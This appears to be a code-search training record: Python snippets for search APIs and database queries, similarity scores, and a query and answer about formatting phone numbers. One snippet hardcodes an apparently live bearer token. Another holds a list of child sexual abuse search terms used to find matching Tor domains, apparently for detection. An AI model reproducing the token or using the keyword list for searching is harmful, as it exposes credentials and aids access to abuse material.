bool(self.__is_key_in_json('is_answered', result_sets.json))\n link = str(self.__is_key_in_json('link', result_sets.json))\n question_id = result_sets.id\n score = result_sets.score\n title = result_sets.title\n view_count = result_sets.view_count\n # check if this question has an owner/user\n if hasattr(result_sets, 'owner'):\n display_name = result_sets.owner.display_name\n profile_link = result_sets.owner.link\n reputation = result_sets.owner.reputation\n user_id = result_sets.owner.id\n user_type = result_sets.owner.user_type\n # create object of the User\n user_obj = StackExchangeUser(display_name, profile_link, reputation, user_id, user_type)\n else:\n user_obj = None\n # create object of the Question\n question_obj = StackExchangeQuestions(accepted_answer_id, answer_count, creation_date, is_answered, link,\n question_id, score, title, view_count, user_obj)\n self.__result_list.append(question_obj)\n return True",
"def search_adapter(json_response):\n\n def get_tracks():\n ret = {\"result\": []}\n for item in json_response['tracks']['items']:\n ret[\"result\"].append(json_to_track_info(item))\n return ret\n\n def get_albums():\n ret = {\"result\": []}\n for item in json_response['albums']['items']:\n album = item['name']\n artist = item['artists'][0]['name']\n album_id = item['uri']\n ret[\"result\"].append(\n {\"album\": album, \"artist\": artist, \"album_id\": album_id})\n return ret\n\n def get_artists():\n ret = {\"result\": []}\n for item in json_response['artists']['items']:\n artist = item['name']\n artist_id = item['uri']\n ret[\"result\"].append({\"artist\": artist, \"id\": artist_id})\n return ret\n\n if json_response.get('tracks', None):\n return get_tracks()\n\n if json_response.get('albums', None):\n return get_albums()\n\n if json_response.get('artists', None):\n return get_artists()\n\n return json_response",
"def main():\n #bearer_token = obtain_bearer_token(API_HOST, TOKEN_PATH)\n bearer_token ='SHdrjUqMJXqXBKUc7bGIplM8y6tnbwZbXXDbWPCd9wWMP8tX9PdJrC5MZHwJRhb7jMtLjXxT-hsWjNf2OkdiDWd30HsS84AVI5iRnrpxkak3HbWXAdUKvraQ_wgXWXYx'\n response = transaction_search(bearer_token, '1910 Entrepreneur Dr, Raleigh, NC 27518')\n response = response.get('businesses')\n print(json.dumps(response, indent=4))",
"def book_search_results(key, title):\n\n payload = {\"key\": key, \"q\": title}\n query = requests.get(\"https://www.goodreads.com/search.xml\", params=payload)\n\n doc = untangle.parse(query.content)\n\n results = doc.GoodreadsResponse.search.results\n\n books = []\n\n if len(results) > 0:\n for work in results.work:\n book = {}\n\n book['title'] = work.best_book.title.cdata\n book['book_id'] = int(work.best_book.id.cdata.encode('utf8'))\n book['author_id'] = int(work.best_book.author.id.cdata.encode('utf8'))\n book['author_fname'] = work.best_book.author.name.cdata\n book['image_url'] = work.best_book.image_url.cdata.encode('utf8')\n books.append(book)\n\n return books",
"def do_search(arg):\n result = {'count': 0, 'time': 0, 'records': []}\n try:\n uri, q, k, m = arg\n dqp = Pyro.core.getProxyForURI(uri)\n scoresLen,results,indocids,exdocids = dqp.search(q, k, m)\n result=(scoresLen,results,indocids,exdocids)\n except Exception as e:\n print \"Exception:\", e\n return result",
"def __update_page_results(self):\n \n pages = []\n\n # Request id for pages associated to search term \n page_fields='page&fields=id,name,username,link'\n term = self.track[self.track_index]\n self.track_index += 1\n \n # Define url for http request to get pages id associated to search term \n page_request_url = 'https://graph.facebook.com/search?q=%s&type=%s&limit=%d&access_token=%s'%(term,page_fields,self.page_lim,self.access_token)\n \n while(True):\n # Try 100 times\n for i in range(100):\n \n page_response = requests.get(page_request_url)\n \n if 'error' in page_response.json() or page_response.status_code <> 200:\n print \"\\n !---- ERROR IN SEARCH REQUEST ----!\"\n print time.ctime()\n print \"Status Code: \", page_response.status_code\n print page_response.json()\n #raise StopIteration()\n time.sleep(1800) # Wait 30 minutes\n else:\n break\n \n page_json = page_response.json()\n pages = pages + page_json['data']\n time.sleep(5)\n \n if 'next' in page_json['paging']:\n page_request_url = page_json['paging']['next']\n else:\n break\n \n print \"Term: %s, Pages: %d\"%(term, len(pages))\n return pages",
"def get_a_business_by_name(current_user):\n business_name = str(request.args.get('q'))\n filter_type = str(request.args.get('filter_type'))\n filter_value = str(request.args.get('filter_value'))\n\n results = Business.query.filter(\n Business.name.ilike('%' + business_name + '%'))\n\n # filter by either category or location\n if filter_type and filter_value:\n if filter_type == 'category':\n results = Business.query.filter(\n Business.category.ilike('%'+filter_value+'%')).filter(\n Business.name.ilike('%' + business_name + '%'))\n\n if filter_type == 'location':\n results = Business.query.filter(\n Business.location.ilike('%' + filter_value + '%')).filter(\n Business.name.ilike('%' + business_name + '%'))\n\n # paginate results\n page = request.args.get('page', 1, type=int)\n limit = request.args.get('limit', results.count(), type=int)\n\n pagination = results.paginate(page, per_page=limit, error_out=False)\n search_results = pagination.items\n prev = None\n\n if pagination.has_prev:\n prev = url_for(\n 'api.get_a_business_by_name', page=page - 1, _external=True)\n next = None\n\n if pagination.has_next:\n next = url_for(\n 'api.get_a_business_by_name', page=page + 1, _external=True)\n\n if not search_results:\n return make_json_reply(\n 'message', 'No businesses registered called ' + business_name), 404\n\n return make_json_reply(\n 'results', {\n 'searched_businesses':\n [business.to_json() for business in search_results],\n 'prev':\n prev,\n 'next':\n next,\n 'records': math.ceil(results.count() / 5)\n }), 200",
"def API_request(self, search_term, search_type):\n url = \"\"\n if search_type == \"product\":\n url = self.url_product.format(search_term)\n elif search_type == \"substitute\":\n url = self.url_substitute.format(search_term)\n r = requests.get(url)\n response = r.json()\n return response[\"products\"]",
"def get_search_results(text, out_file=None, num_res=3):\n # specify the source website\n text += ' site:tableau.com'\n text = urllib.parse.quote_plus(text)\n\n url = 'https://google.com/search?q=' + text\n USER_AGENT = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'}\n \n # TODO: add delay here?\n response = requests.get(url,headers=USER_AGENT)\n\n soup = BeautifulSoup(response.text, 'html.parser')\n result_block = soup.find_all('div', attrs={'class': 'g'})\n\n final_result = []\n for rb_ind in range(len(result_block)):\n if len(final_result)==num_res:\n # done sraping\n break\n \n rb = result_block[rb_ind]\n # print(rb_ind)\n if rb.find('h3'):\n title = rb.find('h3').text\n link = rb.find('a', href=True)['href']\n\n desc = rb.find(class_='IsZvec').text\n \n if not desc:\n # print(rb_ind)\n # print(\"got here\")\n desc = rb.find(class_='ILfuVd')\n if desc:\n desc = desc.text\n else:\n desc = ''\n final_result.append([title,link,desc])\n print('\\n'.join([title,link,desc]))\n\n if out_file is not None:\n with open(out_file,\"a+\",encoding='utf8') as f:\n f.writelines([r + '\\n' for r in final_result])\n \n return final_result",
"def main():\n domain_list = []\n base_url = \"http://localhost:9200/latest-tor/_search?pretty&size=9000&_source=title,domain\"\n keywords_list = ['preteen', 'loli', 'lolita', 'jailbait', 'pthc', 'best cp',\n '\"child porn\"', '\"kid porn\"', '\"child sex\"', '\"cp video\"',\n '\"nude children\"', '\"cp porn\"', '\"free child porn\"', 'kinderporn',\n '\"child rape\"', '\"toddler porn\"', '\"kids videos\"', '\"cp videos\"',\n 'lolilust', '\"pedo porno\"', '\"pedo content\"', 'underage', '\"cp pack\"',\n 'loliporn', 'pedofamily', '\"cp database\"', '\"pedo webcams\"', 'lolitacity']\n '\"xxx child\"', '\"xxx underage\"', '\"young forbidden\"']\n search_terms = []\n for index, term in enumerate(keywords_list):\n search_terms.append(term)\n if len(search_terms) >= 10 or index + 1 == len(keywords_list):\n url = base_url + \"&q=(\" + \" OR \".join(search_terms).replace(\" \", \"%20\") + \")\"\n search(url, domain_list)\n search_terms = []",
"def _run_async_query(self, context):\n url = self._build_url(\"/_search\")\n request = self._build_request(0, -1)\n resp = self._cb.post_object(url, body=request)\n result = resp.json()\n self._total_results = result[\"num_found\"]\n self._count_valid = True\n results = result.get(\"results\", [])\n return [self._doc_class(self._cb, item[\"id\"], item) for item in results]",
"def _run_async_query(self, context):\n url = self._build_url(\"/_search\")\n request = self._build_request(0, -1)\n resp = self._cb.post_object(url, body=request)\n result = resp.json()\n self._total_results = result[\"num_found\"]\n self._count_valid = True\n results = result.get(\"results\", [])\n return [self._doc_class(self._cb, item[\"id\"], item) for item in results]",
"def get_results(job, limit):\n reader = results.ResultsReader(job.results(count=limit))\n return {\"results\": [row for row in reader]}",
"def search(request):\n\tif request.method == 'GET':\n\t\ttitle = request.GET.get('title')\n\t\tname = request.GET.get('person')\n\t\tif title:\n\t\t\treturn search_by_title(title)\n\t\telif name:\n\t\t\treturn search_by_person(name)\n\t\telse:\n\t\t\treturn JSONResponse({})",
"def get_result_by_name(self, name):\n found = None\n for result in self.results:\n if result.heading == name:\n found = result\n break\n return found",
"def get(self, query, count=None):\r\n params = base.get_params(('count',), locals())\r\n params['q'] = query\r\n request = http.Request('GET', self.get_url(), params)\r\n\r\n return request, parsers.parse_json",
"def searchByKeywordPro(self, query, since=\"\", until=\"\", maxResults=None):\n\n tweetsList = []\n if(not maxResults):\n tweetList, next_token = self.api.search_30_day(\n environment_name=\"developer\", query=query, toDate=until, fromDate=since)\n tweetsList.append(tweetList)\n while(next_token):\n tweetList, next_token = self.api.search_30_day(\n environment_name=\"developer\", query=query, toDate=until, fromDate=since, next=next_token)\n tweetsList.append(tweetList)\n else:\n tweetList, next_token = self.api.search_30_day(\n environment_name=\"developer\", query=query, toDate=until, fromDate=since)\n tweetsList.append(tweetList)\n maxResults -= len(tweetList)\n while(next_token and maxResults > 0):\n tweetList, next_token = self.api.search_30_day(\n environment_name=\"developer\", query=query, toDate=until, fromDate=since, next=next_token)\n tweetsList.append(tweetList)\n maxResults -= len(tweetList)\n for status in tweetsList:\n createdDate = parser.parse(str(status._json[\"created_at\"]).strip())\n createdDate = createdDate.replace(\n tzinfo=pytz.utc) - createdDate.utcoffset()\n status_refined = {\n 'keyword': query,\n '_id': status._json[\"id\"],\n 'created_at': createdDate,\n 'tweetText': status._json[\"text\"],\n 'hashtags': status._json[\"entities\"][\"hashtags\"],\n 'userLoc': status._json[\"user\"][\"location\"],\n 'tweetGeo': status._json[\"geo\"],\n 'tweetCoordinates': status._json[\"coordinates\"],\n 'tweetPlace': status._json[\"place\"],\n 'retweet': {},\n 'quote': {},\n }\n if hasattr(status, \"quoted_status\"):\n if \"extended_tweet\" in status._json[\"quoted_status\"].keys():\n print(\"Taking the expanded tweet\")\n status_refined['tweetText'] = status._json[\"quoted_status\"][\"extended_tweet\"][\"full_text\"]\n else:\n status_refined['tweetText'] = status._json[\"quoted_status\"][\"text\"]\n status_refined['quote'] = {\n 'original_retweet_id': status._json[\"quoted_status\"][\"id\"],\n 'origUserLoc': status._json[\"quoted_status\"][\"user\"][\"location\"],\n 'origTweetLoc': status._json[\"quoted_status\"][\"geo\"],\n 'origTweetPlace': status._json[\"quoted_status\"][\"place\"],\n 'origTweetCoord': status._json[\"quoted_status\"][\"coordinates\"],\n 'origHashtags': status._json[\"quoted_status\"][\"entities\"][\"hashtags\"],\n 'retweet_count': status._json[\"quote_count\"],\n }\n elif hasattr(status, \"retweeted_status\"):\n print(status._json[\"retweeted_status\"])\n if \"extended_tweet\" in status._json[\"retweeted_status\"].keys():\n print(\"Taking the expanded tweet\")\n status_refined['tweetText'] = status._json[\"retweeted_status\"][\"extended_tweet\"][\"full_text\"]\n else:\n status_refined['tweetText'] = status._json[\"retweeted_status\"][\"text\"]\n status_refined['retweet'] = {\n 'original_retweet_id': status._json[\"retweeted_status\"][\"id\"],\n 'origUserLoc': status._json[\"retweeted_status\"][\"user\"][\"location\"],\n 'origTweetLoc': status._json[\"retweeted_status\"][\"geo\"],\n 'origTweetPlace': status._json[\"retweeted_status\"][\"place\"],\n 'origTweetCoord': status._json[\"retweeted_status\"][\"coordinates\"],\n 'origHashtags': status._json[\"retweeted_status\"][\"entities\"][\"hashtags\"],\n 'retweet_count': status._json[\"retweet_count\"],\n }\n elif hasattr(status, \"extended_tweet\"):\n if \"extended_tweet\" in status._json.keys():\n status_refined['tweetText'] = status._json[\"extended_tweet\"][\"full_text\"]\n self.tweets.append(status_refined)\n return self.tweets",
"def get(self, request, format=None):\n user = request.user\n user.backend = 'django.contrib.auth.backends.ModelBackend'\n login(request, user)\n keywords = request.GET.get('tags', '')\n result = {\n 'keywords': [],\n 'trademark': 0\n }\n\n if keywords != '':\n for word in keywords.split(','):\n payload = {\n 'apikey': settings.KEYWORDTOOL,\n 'keyword': '[{0}]'.format(word),\n 'output': 'json',\n 'country': 'us',\n 'language': 'en',\n 'metrics': 'true',\n 'metrics_location': '2840',\n 'metrics_language': 'en'\n }\n word = word.lower()\n\n word_result = Word.objects.filter(name=word).first()\n\n if word_result:\n data = word_result.results\n else:\n data = False\n try:\n data_keywordtool = requests.get(\n 'http://api.keywordtool.io/v2/search/suggestions/amazon', params=payload)\n if data_keywordtool.status_code == 200:\n results = data_keywordtool.json()\n created_word = Word.objects.create(\n name=word, results=results)\n data = created_word.results\n except Exception as e:\n pass\n\n list_keywords = []\n if data:\n for item in data['results']:\n for sub_item in data['results'][item]:\n if 'volume' in sub_item and 'string' in sub_item:\n if sub_item['volume'] > 300 and not sub_item['string'] in list_keywords:\n list_keywords.append(sub_item['string'])\n result['keywords'].append({'name': sub_item['string'].replace(\n '[', '').replace(']', ''), 'volume': sub_item['volume'], 'trademark': False})\n\n return Response(result)",
"def get_search_results(results):\n if len(results) == 0:\n return []\n if type(results) == tuple and len(results) == 2:\n (code, arr) = results\n elif type(results) == list:\n arr = results\n\n res = []\n for item in arr:\n res.append(LDAPSearchResult(item))\n\n return res",
"def _search(q: str, n: int):\n return search_client.retrieve([q], n)[0]",
"def get(self):\n uri = urlparse(self.request.uri)\n query = ''\n results = []\n number_returned = 0\n if uri.query:\n query = parse_qs(uri.query)\n query = query['query'][0]\n\n # sort results by salesRankMediumTerm and bestSellingRank descending\n expr_list = [search.SortExpression(\n expression='salesRankMediumTerm', default_value='',\n direction=search.SortExpression.DESCENDING), search.SortExpression(\n expression='bestSellingRank', default_value='',\n direction=search.SortExpression.DESCENDING)]\n\n # construct the sort options\n sort_opts = search.SortOptions(\n expressions=expr_list)\n query_options = search.QueryOptions(\n limit=10,\n sort_options=sort_opts)\n query_obj = search.Query(query_string=query, options=query_options)\n results = search.Index(name=_INDEX_NAME).search(query=query_obj)\n number_returned = len(results.results)\n\n # use magic python incantations to extract and filter on returned doc IDs\n dsids = iterattr(results,'doc_id')\n # dammit, remember that you have to int() your keys\n dskeys = [ndb.Key(BestBuyProduct, int(k)) for k in dsids]\n dsresults = ndb.get_multi(dskeys)\n\n template_values = {\n 'results': results,\n 'dsresults': dsresults,\n 'number_returned': number_returned,\n 'query': query,\n }\n self.render_template('index.html', template_values)",
"def get_search_result(self, user_input):\n\n conn = sqlite3.connect(self.db_name)\n\n request_field = '%' + user_input[0].strip() + '%'\n request_city = '%' + user_input[1].strip() + '%'\n\n activity_ids = []\n activities_dictionary = {}\n activities_array = self.search_activity(conn, request_field)\n for data in activities_array:\n # We use an array of id to easily iterate and a dictionary to find the names correspondence later\n activity_ids.append(data[0])\n activities_dictionary[data[0]] = data[1]\n\n equipment_activity_ids = {}\n equipment_ids = []\n for data in self.get_equipments_by_activity(conn, activity_ids):\n equipment_ids.append(data[0])\n # If the reference doesn't exist we create it, if it does we add the activityId to it\n if data[0] in equipment_activity_ids:\n equipment_activity_ids.get(data[0]).append(data[1])\n else:\n equipment_activity_ids[data[0]] = [data[1]]\n\n equipments_array = self.get_equipments_by_ids(conn, equipment_ids)\n\n installation_ids = []\n for data in equipments_array:\n if data[2] not in installation_ids:\n installation_ids.append(data[2])\n\n installations_list = []\n # At first we get all installations matching our previously gathered ids and the city name\n for data_installation in self.search_installation(conn, request_city, installation_ids):\n current_installation = Installation(data_installation[0], data_installation[1], data_installation[2],\n data_installation[3], data_installation[4], data_installation[5],\n data_installation[6])\n for data_equipment in equipments_array:\n if data_equipment[2] == current_installation.id:\n current_equipment = Equipment(data_equipment[0], data_equipment[1], data_equipment[2])\n # Then, we add the matching equipments to the installation object\n for key in equipment_activity_ids.keys():\n if key == current_equipment.id:\n for value in equipment_activity_ids.get(key):\n # And the matching activities to the equipment object\n current_equipment.add_activity(Activity(value, activities_dictionary.get(value)))\n\n current_installation.add_equipment(current_equipment)\n equipments_array.remove(data_equipment)\n\n installations_list.append(current_installation)\n\n conn.close()\n\n return installations_list",
"def API_companysearch(request):\n company = request.GET.get(\"search\")\n company = str(company).strip()\n results = models.Company.objects.filter(name__icontains = company)\n results = [[company.pk,company.name] for company in results]\n return django.http.JsonResponse({\"success\":True,\"results\":results})"
] | [
"0.66276145",
"0.64622295",
"0.6457914",
"0.63681644",
"0.6349981",
"0.6308854",
"0.61306053",
"0.610485",
"0.6067382",
"0.6036991",
"0.6029927",
"0.6004755",
"0.599794",
"0.5988681",
"0.5967956",
"0.59640205",
"0.59510136",
"0.59347636",
"0.5904494",
"0.5894489",
"0.58941627",
"0.5854421",
"0.58452606",
"0.58301514",
"0.581294",
"0.57973486",
"0.57860017",
"0.5715516",
"0.5701925",
"0.56949675",
"0.56795156",
"0.56657547",
"0.5656504",
"0.56552166",
"0.56500673",
"0.5644365",
"0.56343067",
"0.5633818",
"0.5626904",
"0.5618177",
"0.5610227",
"0.55919987",
"0.55753034",
"0.5564365",
"0.5557539",
"0.5544373",
"0.5533774",
"0.55305463",
"0.5523531",
"0.55112916",
"0.54973274",
"0.54945004",
"0.5494356",
"0.5493225",
"0.5488082",
"0.5487667",
"0.54824775",
"0.5479659",
"0.5475852",
"0.54655015",
"0.5460016",
"0.5459708",
"0.5456413",
"0.5455547",
"0.5452221",
"0.5452221",
"0.545142",
"0.5448127",
"0.5445892",
"0.5438542",
"0.5437106",
"0.54350585",
"0.5427371",
"0.5425259",
"0.541577",
"0.54088676",
"0.54019636",
"0.54003316",
"0.5398073",
"0.53954643",
"0.5374319",
"0.5370074",
"0.5364909",
"0.53633755",
"0.53615546",
"0.5360936",
"0.5356412",
"0.5354532",
"0.5354532",
"0.5352124",
"0.53519523",
"0.53500193",
"0.5345639",
"0.53453356",
"0.53418666",
"0.53410006",
"0.5340845",
"0.5335779",
"0.53290105",
"0.5324427"
] | 0.6288888 | 6 |
phone numbers should be correctly formatted, and some searches were returning errors from missing numbers | def phone_number_organizer(self, key):
try:
phone_number = key[u'phone']
format_number = '(' + phone_number[0:3] + ') ' + phone_number[3:6] + '-' + phone_number[6:]
return format_number
except KeyError:
print [u'name'], "requires manual phone number verification."
return "Manual Input" | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def audit_phone_numbers(formats, number):\n\n # check formatting\n if re.match(r'^\\+39', number): # starts with +39\n formats['has_country_code'] += 1\n else:\n formats['no_country_code'] += 1\n if re.match(r'^(?:\\+?39)?81', number):\n formats['missing_prefix'] += 1\n if re.search('-', number): # has a dash\n formats['has_dashes'] += 1\n if re.search(r'\\s', number): # contains any whitespace character\n formats['has_spaces'] += 1\n\n # Strip number to count digits\n digits_only = re.sub(r'[^\\d]', '', number)\n # remove country code to count remaining digits\n digits_only = re.sub(r'^39', '', digits_only)\n if not 6 <= len(digits_only) <= 11:\n formats['incorrect_length'].append(number)\n\n # catch all numbers with unexpected characters\n if re.search(r'[^\\+\\d\\s-]', number):\n formats['bad_chars'].append(number)",
"def test_format_phone_formatted(self):\n number1 = '809.555.1234'\n self.assertEqual(format_phone(number1), '(809) 555-1234')\n number2 = '(888) 555-3456'\n self.assertEqual(format_phone(number2), '(888) 555-3456')",
"def format_and_validate_phonenumber(number):\n \n if number.startswith('+'):\n number = number.replace('+', '00', 1)\n \n regex = re.compile('(\\/|\\+|-| )')\n number = regex.sub('', number)\n \n if number.startswith(COUNTRY_CODE_PHONE):\n number = number.replace(COUNTRY_CODE_PHONE, '0', 1)\n\n # if the conversion to int does not fail then\n # there are only numbers included in the string\n try:\n int(number)\n except ValueError:\n raise ValidationError(_('Please enter numbers only.'))\n \n if number.startswith(START_MOBILE_PHONE):\n return number\n else:\n raise ValidationError(_('Please enter a cell phone number.'))",
"def test_format_phone_raw(self):\n number = '8095551234'\n self.assertEqual(format_phone(number), '(809) 555-1234')",
"def test_formatted_number(self):\n node = self.create_xml_patient({'Mobile_Number': '(33)-0001112222'})\n payload = self.create_payload([node])\n parse_patient(node, payload)\n patient = payload.patients.all()[0]\n self.assertEqual(patient.contact.phone, '+330001112222')",
"def check_format_user_phone(phone):\n match = re.match(r'^\\+[0-9]{10,}$', phone)\n if not match:\n raise exceptions.ValidationError('phone is not valid!')\n return phone",
"def test_address__normalize_phone_number__3():\n assert '+491234567891' == normalize_phone_number('01234/5678-91', '+49')",
"def phone_valid(number):\n model = '[0-9]{2} [0-9]{5}-[0-9]{4}'\n\n return re.findall(model, number)",
"def test_address__normalize_phone_number__4():\n assert '+491234507090' == normalize_phone_number('01234/5070-90', '+49')",
"def test_address__normalize_phone_number__2():\n assert '+491234567890' == normalize_phone_number(\n '+49 (1234) 5678 - 90X', '+49')",
"def clean_phone(self):\n data = self.cleaned_data['phone']\n data = data.strip(' +').replace('-', '')\n if len(data) == 12:\n data = data[3:]\n\n return data",
"def test_00_phonenumbers_formatting_en_US(self):\n number_phone = self.samples[0]\n res = self.pn._symbol_set_char(number_phone)\n self.assertEqual(res, '+19545551234', 'e164 phone formatting failed')\n res = self.pn._symbol_get(number_phone)\n self.assertEqual(res, '+1 954-555-1234', 'International phone formatting failed')",
"def clean_phone(self):\n phone = self.cleaned_data['phone']\n if phone.startswith('8') and len(phone) > 7:\n return phone.replace('8', '+7', 1)\n\n return phone",
"def test_address__normalize_phone_number__7():\n assert '+421234007891' == normalize_phone_number(\n '0042-1234/0078-91', '+49')",
"def normalize(phone):\n d = re.sub('\\D', '', phone)\n return '+7 (%s) %s-%s-%s' % (d[1:4], d[4:7], d[7:9], d[9:11])",
"def test_address__normalize_phone_number__6():\n assert '+421234567891' == normalize_phone_number(\n '0042-1234/5678-91', '+49')",
"def validate_phone(form, field):\n if len(field.data) > 16:\n raise ValidationError('Invalid phone number')\n try:\n input_number = phonenumbers.parse(field.data)\n if not (phonenumbers.is_valid_number(input_number)):\n raise ValidationError('Invalid phone number')\n except Exception:\n input_number = phonenumbers.parse('+1' + field.data)\n if not (phonenumbers.is_valid_number(input_number)):\n raise ValidationError('Invalid phone number')",
"def test_30_phonenumbers_empty(self):\n number_phone = self.samples[3]\n res = self.pn._symbol_set_char(number_phone)\n self.assertEqual(res, None, 'e164 phone formatting failed')\n res = self.pn._symbol_get(number_phone)\n self.assertEqual(res, None, 'International phone formatting failed')",
"def clean_phone(number):\n numberlist = re.findall(\"\\d\",number)\n new_number = \"\".join(numberlist)\n if len(new_number) == 8:\n \tnew_number = \"010\" + new_number\n\tnew_number = new_number[-11:]\n\tif new_number.startswith('1'):\n\t\tnew_number = \"+86-\" + new_number\n\telse:\n\t\tnew_number = \"+86-10-\" + new_number[-8:]\n\treturn new_number",
"def phoneNumberExtractor(self,data):\n\t\tdata = data.replace(\"\\r\", \" \")\n\t\tdata = data.replace(\"\\r\\n\", \" \")\n\n\t\t#first is identifying 10 digits code\n\t\tdata = data.split()\n\t\tresult = []\n\t\tfor word in data:\n\t\t\tres = None\n\t\t\tres = word if word.isdecimal() and len(word) == 10 and not res else res\n\t\t\tres = word[2:] if word.isdecimal() and len(word) == 12 and not res else res\n\t\t\tres = word[3:] if word[3:].isdecimal() and len(word) == 10 and not res else res\n\t\t\tif (\"(\" and \")\") in word or \"-\" in word:\n\t\t\t\tword = word.replace(\"(\",\"\")\n\t\t\t\tword = word.replace(\")\",\"\")\n\t\t\t\tword = word.replace (\"-\",\"\")\n\t\t\t\tres = word if(len(word) == 10) else None\n\t\t\tif res:\n\t\t\t\tresult.append(res)\n\t\t\t\tdel(res)\n\t\treturn set(result)",
"def test_40_phonenumbers_too_long(self):\n number_phone = self.samples[4]\n with self.assertRaises(osv.except_osv):\n self.pn._symbol_set_char(number_phone)",
"def phone(raw_phone):\n\n phone = raw_phone.replace('+33', '0')\n phone = '{} {} {} {} {}'.format(\n phone[0:2],\n phone[2:4],\n phone[4:6],\n phone[6:8],\n phone[8:10])\n return phone",
"def parse_phone(phone):\n if isinstance(phone, int):\n return str(phone)\n else:\n phone = re.sub(r'[+()\\s-]', '', str(phone))\n if phone.isdigit():\n return phone",
"def test_address__normalize_phone_number__1():\n assert '+491234567890' == normalize_phone_number('+491234567890', '+49')",
"def test_valid_phone_valid():\n assert valid_phone(\"000-000-0000\")\n assert valid_phone(\"0000000000\")",
"def reg_phone(str_phone:str) -> object:\r\n\r\n [ind, nph]=str_phone.strip(\"+\").split(\" \")\r\n #Cut off the local 0\r\n #Create regexes for 3 cases : with IND and without 0, without IND and with 0, without IND and 0\r\n formats=[\\\r\n \"(?P<ind>{})? ?0?(?P<num>{})\".format(ind, ' ?'.join(list(nph.rstrip('0'))))\r\n ]\r\n return re.compile(f'({\"|\".join(formats)})')",
"def telephone(value, arg=None):\n \n # Normalise a number\n value = value.replace(\" \", \"\").replace(\"-\", \"\")\n if value.startswith(\"0\"):\n value = \"+44\" + value[1:]\n normalised = value\n \n # Check if it's a number which is formatted in a special way\n if normalised in UNUSUAL_NUMBERS:\n value = UNUSUAL_NUMBERS[normalised]\n else:\n # Figure out how to format that number\n \n # Convert UK numbers into national format\n if value.startswith(\"+44\"):\n value = \"0\" + value[3:]\n \n # Now apply rules on how to split up area codes\n if value[:8] in ('01332050', '01382006'):\n # Direct dial only\n value = value[:5] + \" \" + value[5:]\n elif value[:7] in ('0141005', '0117101') or value[:6] in ('011800',):\n # Direct dial only\n value = value[:4] + \" \" + value[4:7] + \" \" + value[7:]\n elif value[:7] in ('0200003',):\n # Direct dial only\n value = value[:3] + \" \" + value[3:7] + \" \" + value[7:]\n elif value.startswith('01'):\n if value[2] == '1' or value[3] == '1':\n # 4 digit area codes\n area_code = value[:4]\n local_part = value[4:7] + \" \" + value[7:]\n elif value[:6] in (\n '013873', # Langholm\n '015242', # Hornby\n '015394', # Hawkshead\n '015395', # Grange-over-Sands\n '015396', # Sedbergh\n '016973', # Wigton\n '016974', # Raughton Head\n '016977', # Brampton\n '017683', # Appleby\n '017684', # Pooley Bridge\n '017687', # Keswick\n '019467', # Gosforth\n ):\n # 6 digit area codes\n area_code = value[:4] + \" \" + value[4:6]\n local_part = value[6:]\n else:\n # 5 digit\n area_code = value[:5]\n local_part = value[5:]\n \n value = \"(%s) %s\" % (area_code, local_part)\n \n elif value.startswith('02'):\n # 3 digit area codes\n value = \"(%s) %s %s\" % (value[:3], value[3:7], value[7:])\n \n elif value.startswith('0500') or value.startswith('0800'):\n # direct dial - 4 digit prefix, short following\n value = \"%s %s\" % (value[:4], value[4:])\n \n elif value.startswith('03') or value.startswith('08') or value.startswith('09'):\n # direct dial - 4 digit prefix\n value = \"%s %s %s\" % (value[:4], value[4:7], value[7:])\n \n elif value.startswith('05') or value.startswith('070'):\n # direct dial - 3 digit prefix\n value = \"%s %s %s\" % (value[:3], value[3:7], value[7:])\n \n elif value.startswith('07'):\n # direct dial - 5 digit prefix, short following\n value = \"%s %s\" % (value[:5], value[5:])\n\n # Now apply University rules:\n if value[:10] in ('(01865) 27', '(01865) 28', '(01865) 43', '(01865) 61'):\n # Oxford - list of internal number prefixes here:\n # http://www.oucs.ox.ac.uk/telecom/directories/intdiraccess.xml\n value = \"(01865 \" + value[8] + \")\" + value[9:]\n\n if arg == 'nolink':\n return value\n else:\n return mark_safe('<a href=\"tel:%s\">%s</a>' % (normalised, value))",
"def clean_phone(number_str):\n number_str = number_str or ''\n number_str = number_str.replace('(', '').replace(')', '')\n number_str = number_str.replace('ext. ', 'x').replace('ext ', 'x')\n number_str = number_str.split(',')[0].strip()\n\n if number_str:\n return number_str",
"def test_address__normalize_phone_number__5():\n assert '01234567891' == normalize_phone_number('01234/5678-91', '')",
"def test_bad_phone():\n bad_phone = \"213-555-121\"\n m = CannedRe.PHONE.match(bad_phone)\n assert m is None, \"Canned RegEx phone test succeeded for %s while it should not\" % bad_phone",
"def validate_phone(self, data):\n value = data.strip()\n if re.match(constant.NUMBER_ONLY, value):\n if User.objects.filter(phone=value).exists():\n raise serializers.ValidationError('phone number already registered')\n return value\n raise serializers.ValidationError(VALIDATION['phone']['invalid'])",
"def update_phone(phone, phone_mapping):\n results = []\n for iphone in re.split(',|;',phone):\n patterns = phone_pattern_re.search(iphone)\n if patterns:\n numbers = patterns.groups()\n if numbers[0] == \"852\":\n results.append(re.compile(r'\\D?(\\d{0,4}?)\\D{0,2}(\\d{4})\\D?(\\d{4})$', iphone))\n elif numbers[0] in phone_mapping:\n results.append (\"+852\"+ \" \" + numbers[1] + numbers[2])\n return ';'.join(results)",
"def tidy_telephone(telephone):\n junk = ['none', 'none1', 'na', 'n/a', 'same', 'yes', 'cell', 'offsite']\n telephone = telephone.replace('xxx-xxx-xxxx', '')\n telephone = telephone.replace('ext', ' x')\n telephone = telephone.replace(' cell', '')\n telephone = telephone.replace('\"', '')\n telephone = telephone.replace('%', '')\n if telephone in junk:\n return ''\n else:\n return telephone",
"def _cleanse_phone_numbers(numbers):\n\n hit = False\n\n # Ensure we have a list.\n # Might have received a single string or long integer.\n if not isinstance(numbers, list):\n numbers = [numbers]\n\n cleansed_list = list()\n\n for i, elem in enumerate(numbers):\n\n # Only append if it's a valid email\n if elem is not None:\n\n # Convert integers (and others) to string\n wip = str(elem)\n\n # Isolate decimal numbers\n wip = ''.join(e for e in wip if e.isdecimal())\n\n # Strip leading 0 and 1s, if there was more than one decimal number\n if len(wip) > 1:\n while wip[0] in ['0', '1'] and len(wip) > 1:\n wip = wip[1:]\n\n # Append IFF we have a string with 10 digits\n if len(wip) == 10:\n cleansed_list.append(wip)\n hit = True\n\n else:\n pass\n\n # Handle case: No valid number-strings in the list\n cleansed_list = [None] if len(cleansed_list) == 0 else cleansed_list\n\n return cleansed_list, hit",
